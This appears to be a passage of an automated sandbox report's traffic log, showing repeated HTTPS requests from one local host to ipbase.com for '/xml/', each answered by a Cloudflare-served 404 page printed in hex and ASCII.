                                      2024-09-06 23:48:58 UTC1091INData Raw: 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.
                                      2024-09-06 23:48:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      58192.168.2.549821104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:49:01 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:49:01 UTC745INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:49:01 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 24628
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VVFWKKNXEPRGEXVXN4475
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ChIRO7xaxtwSGCN%2BqMPvUv%2BsvGXGpUxkh3fu5IuflzcJdRXZgxIb%2BTbz3s3PpLPwOSyO3tqt8chNLEk35le%2B%2FJuUHaJGhsSx8%2Bdo6hn%2F0GnzHfDEFzvS0mxwH%2Fvo"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a6bfbd9c325-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:49:01 UTC624INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:49:01 UTC1369INData Raw: 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20
                                      Data Ascii: padding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center;
                                      2024-09-06 23:49:01 UTC1096INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.242085
                                      2024-09-06 23:49:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      59192.168.2.549824104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:49:03 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:49:03 UTC739INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:49:03 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 30349
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VVHYZQ9PBP7HAC3YZ3B0K
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A1kwaaSxU2BmqLERBew%2BkRroJClGGvA%2BE8%2BI4yK0wx4fJuncYL6tcZBJi2D%2FoelkCyTxTXCbH5gounPVLgc3BlSP9mLTa3qYlACwZsQ6KMkqS%2B0f27HBr6ab8WJB"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a793805186d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:49:03 UTC630INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:49:03 UTC1369INData Raw: 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68
                                      Data Ascii: ding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; heigh
                                      2024-09-06 23:49:03 UTC1090INData Raw: 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4
                                      2024-09-06 23:49:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      60192.168.2.549826104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:49:08 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:49:08 UTC735INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:49:08 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33403
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VVPTE6J1V2K7M0WMRAR35
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkfgao4CTxxgQqeCA2MfDHtEyGAMcSgNvxdy4Se3LIQJN%2FLpEwNgEotNPodeYxTrYhpdv5piKkAEpcNeQiwx0rPtCZljuzNIeTDXHz7XI3S9hI%2FoTR06%2BoKx91CX"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a984c2b4282-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:49:08 UTC634INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:49:08 UTC1369INData Raw: 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31
                                      Data Ascii: : 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 1
                                      2024-09-06 23:49:08 UTC1086INData Raw: 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294
                                      2024-09-06 23:49:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      61192.168.2.549831104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:49:13 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:49:13 UTC737INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:49:13 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 11977
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VVV9X64BVZWK4Q6QMS891
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1o8K11UUPRYUzuGIgCZvqEsAePQfndC%2BdftMZSas4M87euai7PCc8fYhAK%2Fzv4BIFszf6Z7kcQ4MGxcwfbLt12hCQkAZ%2FYgTow14zAHS46f3wiQA0zHC1Ay0%2Bis"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25ab50fb07d06-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:49:13 UTC632INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:49:13 UTC1369INData Raw: 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a
                                      Data Ascii: ng: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:49:13 UTC1088INData Raw: 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432
                                      2024-09-06 23:49:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      62192.168.2.549834104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:49:15 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:49:15 UTC740INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:49:15 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7759
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VVXGP7ME07HB8CT07821J
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TN7a3LITMkUnS64ko%2FUpC9UBkp5gNq7HMI%2BthqHRufsJ2qNDYaToFEAm9ZVnE%2FLaggHyMCtsN6%2FZ0%2B460leRosyRDpJ%2FpJWpuktEvTL0KqnyT4KrSiJ0FdyB35U7"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25ac34a8442a1-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:49:15 UTC629INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:49:15 UTC1369INData Raw: 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67
                                      Data Ascii: dding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; heig
